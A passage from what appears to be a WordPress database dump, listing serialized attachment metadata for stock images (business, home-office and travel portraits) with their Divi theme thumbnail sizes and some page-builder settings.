ile\";s:37:\"circle-background-pattern-400x250.png\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:9:\"image/png\";}s:31:\"et-pb-post-main-image-fullwidth\";a:4:{s:4:\"file\";s:38:\"circle-background-pattern-1080x675.png\";s:5:\"width\";i:1080;s:6:\"height\";i:675;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:37:\"circle-background-pattern-400x284.png\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:9:\"image/png\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:37:\"circle-background-pattern-510x382.png\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:9:\"image/png\";}s:28:\"et-pb-portfolio-image-single\";a:4:{s:4:\"file\";s:38:\"circle-background-pattern-1080x477.png\";s:5:\"width\";i:1080;s:6:\"height\";i:477;s:9:\"mime-type\";s:9:\"image/png\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:37:\"circle-background-pattern-400x516.png\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:9:\"image/png\";}s:32:\"et-pb-image--responsive--desktop\";a:4:{s:4:\"file\";s:38:\"circle-background-pattern-1280x565.png\";s:5:\"width\";i:1280;s:6:\"height\";i:565;s:9:\"mime-type\";s:9:\"image/png\";}s:31:\"et-pb-image--responsive--tablet\";a:4:{s:4:\"file\";s:37:\"circle-background-pattern-980x433.png\";s:5:\"width\";i:980;s:6:\"height\";i:433;s:9:\"mime-type\";s:9:\"image/png\";}s:30:\"et-pb-image--responsive--phone\";a:4:{s:4:\"file\";s:37:\"circle-background-pattern-480x212.png\";s:5:\"width\";i:480;s:6:\"height\";i:212;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(268,122,'_wp_attached_file','2020/07/business-13.jpg'),(269,122,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1282;s:4:\"file\";s:23:\"2020/07/business-13.jpg\";s:5:\"sizes\";a:14:{s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"business-13-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:24:\"business-13-1024x684.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:684;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"business-13-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"business-13-768x513.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:513;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:25:\"business-13-1536x1026.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1026;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:23:\"business-13-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:31:\"et-pb-post-main-image-fullwidth\";a:4:{s:4:\"file\";s:24:\"business-13-1080x675.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:675;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:23:\"business-13-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:23:\"business-13-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"et-pb-portfolio-image-single\";a:4:{s:4:\"file\";s:24:\"business-13-1080x721.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:721;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:23:\"business-13-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:32:\"et-pb-image--responsive--desktop\";a:4:{s:4:\"file\";s:24:\"business-13-1280x855.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:855;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:31:\"et-pb-image--responsive--tablet\";a:4:{s:4:\"file\";s:23:\"business-13-980x654.jpg\";s:5:\"width\";i:980;s:6:\"height\";i:654;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:30:\"et-pb-image--responsive--phone\";a:4:{s:4:\"file\";s:23:\"business-13-480x321.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:321;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(270,123,'_wp_attached_file','2020/07/business_01.jpg'),(271,123,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1290;s:6:\"height\";i:861;s:4:\"file\";s:23:\"2020/07/business_01.jpg\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"business_01-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:24:\"business_01-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"business_01-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"business_01-768x513.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:513;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:23:\"business_01-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:31:\"et-pb-post-main-image-fullwidth\";a:4:{s:4:\"file\";s:24:\"business_01-1080x675.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:675;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:23:\"business_01-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:23:\"business_01-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"et-pb-portfolio-image-single\";a:4:{s:4:\"file\";s:24:\"business_01-1080x721.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:721;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:23:\"business_01-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:32:\"et-pb-image--responsive--desktop\";a:4:{s:4:\"file\";s:24:\"business_01-1280x854.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:854;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:31:\"et-pb-image--responsive--tablet\";a:4:{s:4:\"file\";s:23:\"business_01-980x654.jpg\";s:5:\"width\";i:980;s:6:\"height\";i:654;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:30:\"et-pb-image--responsive--phone\";a:4:{s:4:\"file\";s:23:\"business_01-480x320.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(272,124,'_wp_attached_file','2020/07/home-office-01.jpg'),(273,124,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1080;s:6:\"height\";i:672;s:4:\"file\";s:26:\"2020/07/home-office-01.jpg\";s:5:\"sizes\";a:10:{s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"home-office-01-300x187.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:187;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:27:\"home-office-01-1024x637.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:637;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"home-office-01-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"home-office-01-768x478.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:478;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:26:\"home-office-01-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:26:\"home-office-01-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:26:\"home-office-01-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:26:\"home-office-01-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:31:\"et-pb-image--responsive--tablet\";a:4:{s:4:\"file\";s:26:\"home-office-01-980x610.jpg\";s:5:\"width\";i:980;s:6:\"height\";i:610;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:30:\"et-pb-image--responsive--phone\";a:4:{s:4:\"file\";s:26:\"home-office-01-480x299.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:299;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(274,125,'_wp_attached_file','2020/07/travel-portrait-01.jpg'),(275,125,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:800;s:4:\"file\";s:30:\"2020/07/travel-portrait-01.jpg\";s:5:\"sizes\";a:8:{s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"travel-portrait-01-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"travel-portrait-01-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:30:\"travel-portrait-01-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:31:\"et-pb-post-main-image-fullwidth\";a:4:{s:4:\"file\";s:30:\"travel-portrait-01-600x675.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:675;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:30:\"travel-portrait-01-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:30:\"travel-portrait-01-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:30:\"travel-portrait-01-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:30:\"et-pb-image--responsive--phone\";a:4:{s:4:\"file\";s:30:\"travel-portrait-01-480x640.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(276,126,'_wp_attached_file','2020/07/travel-portrait-06.jpg'),(277,126,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:800;s:4:\"file\";s:30:\"2020/07/travel-portrait-06.jpg\";s:5:\"sizes\";a:8:{s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"travel-portrait-06-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"travel-portrait-06-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:30:\"travel-portrait-06-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:31:\"et-pb-post-main-image-fullwidth\";a:4:{s:4:\"file\";s:30:\"travel-portrait-06-600x675.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:675;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:30:\"travel-portrait-06-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:30:\"travel-portrait-06-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:30:\"travel-portrait-06-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:30:\"et-pb-image--responsive--phone\";a:4:{s:4:\"file\";s:30:\"travel-portrait-06-480x640.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(278,127,'_wp_attached_file','2020/07/travel-portrait-04.jpg'),(279,127,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:800;s:4:\"file\";s:30:\"2020/07/travel-portrait-04.jpg\";s:5:\"sizes\";a:8:{s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"travel-portrait-04-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"travel-portrait-04-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:30:\"travel-portrait-04-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:31:\"et-pb-post-main-image-fullwidth\";a:4:{s:4:\"file\";s:30:\"travel-portrait-04-600x675.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:675;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:30:\"travel-portrait-04-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:30:\"travel-portrait-04-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:30:\"travel-portrait-04-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:30:\"et-pb-image--responsive--phone\";a:4:{s:4:\"file\";s:30:\"travel-portrait-04-480x640.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(280,128,'_wp_attached_file','2020/07/home-office-06.jpg'),(281,128,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:800;s:4:\"file\";s:26:\"2020/07/home-office-06.jpg\";s:5:\"sizes\";a:9:{s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"home-office-06-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"home-office-06-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"home-office-06-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:26:\"home-office-06-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:31:\"et-pb-post-main-image-fullwidth\";a:4:{s:4:\"file\";s:26:\"home-office-06-800x675.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:675;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:26:\"home-office-06-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:26:\"home-office-06-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:26:\"home-office-06-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:30:\"et-pb-image--responsive--phone\";a:4:{s:4:\"file\";s:26:\"home-office-06-480x480.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(282,129,'_wp_attached_file','2020/07/home-office-05.jpg'),(283,129,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:800;s:4:\"file\";s:26:\"2020/07/home-office-05.jpg\";s:5:\"sizes\";a:9:{s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"home-office-05-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"home-office-05-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"home-office-05-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:26:\"home-office-05-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:31:\"et-pb-post-main-image-fullwidth\";a:4:{s:4:\"file\";s:26:\"home-office-05-800x675.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:675;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:26:\"home-office-05-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:26:\"home-office-05-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:26:\"home-office-05-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:30:\"et-pb-image--responsive--phone\";a:4:{s:4:\"file\";s:26:\"home-office-05-480x480.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(284,130,'_wp_attached_file','2020/07/home-office-02.jpg'),(285,130,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:800;s:4:\"file\";s:26:\"2020/07/home-office-02.jpg\";s:5:\"sizes\";a:9:{s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"home-office-02-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"home-office-02-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"home-office-02-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:26:\"home-office-02-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:31:\"et-pb-post-main-image-fullwidth\";a:4:{s:4:\"file\";s:26:\"home-office-02-800x675.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:675;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:26:\"home-office-02-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:26:\"home-office-02-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:26:\"home-office-02-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:30:\"et-pb-image--responsive--phone\";a:4:{s:4:\"file\";s:26:\"home-office-02-480x480.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(309,134,'_edit_lock','1683196080:1'),(310,134,'_et_pb_use_builder','on'),(311,134,'_et_gb_content_width',''),(312,134,'_edit_last','1'),(313,134,'_et_pb_post_hide_nav','default'),(314,134,'_et_pb_page_layout','et_right_sidebar'),(315,134,'_et_pb_side_nav','off'),(324,138,'_wp_attached_file','2020/07/home-office-07-1.png'),(325,138,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:800;s:4:\"file\";s:28:\"2020/07/home-office-07-1.png\";s:5:\"sizes\";a:9:{s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"home-office-07-1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"home-office-07-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:28:\"home-office-07-1-768x768.png\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:28:\"home-office-07-1-400x250.png\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:9:\"image/png\";}s:31:\"et-pb-post-main-image-fullwidth\";a:4:{s:4:\"file\";s:28:\"home-office-07-1-800x675.png\";s:5:\"width\";i:800;s:6:\"height\";i:675;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:28:\"home-office-07-1-400x284.png\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:9:\"image/png\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:28:\"home-office-07-1-510x382.png\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:9: